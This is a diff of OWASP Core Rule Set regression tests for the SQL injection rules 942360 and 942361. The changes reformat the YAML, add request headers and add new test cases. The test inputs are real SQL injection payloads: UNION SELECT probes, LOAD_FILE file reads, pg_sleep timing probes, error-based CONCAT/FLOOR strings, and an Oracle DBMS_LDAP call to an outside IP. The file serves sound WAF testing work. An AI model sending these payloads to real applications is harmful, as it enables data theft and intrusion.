@@ -1,557 +1,670 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" - description: None - enabled: true - name: 942360.yaml - tests: - - - test_title: 942360-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 
CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: 
") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: 
"/" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: 
POST - port: 80 - uri: "/" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-14 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-15 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-16 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-17 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: 
- log_contains: id "942360" - - - test_title: 942360-18 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-19 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-20 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-21 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-22 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-23 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-24 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: 
- input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-25 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-26 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-27 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-28 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-29 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-30 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 
As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 desc: GH issue 1580 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - - test_title: 942360-31 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-15 desc: GH issue 1605 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - - test_title: 942360-32 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-16 desc: GH issue 1605 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: ModSecurity CRS 3 Tests - method: POST - port: 80 - uri: / - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" 
+ version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-18 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "5desc" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-19 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-20 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-21 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "/select-quote" + version: HTTP/1.0 
+ output: + no_log_contains: id "942360" + - test_title: 942360-22 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Update: After..." + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-23 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-24 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-25 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-26 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "bla blabla live update chart" + 
version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-27 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-28 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-29 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-33 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-34 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-35 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT 
(CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-36 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-37 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-38 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-39 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 4d0587c53f..fdb36966b5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml 
@@ -1,126 +1,126 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942361.yaml - tests: - - - test_title: 942361-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942361.yaml +tests: + - test_title: 942361-1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - - test_title: 942361-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
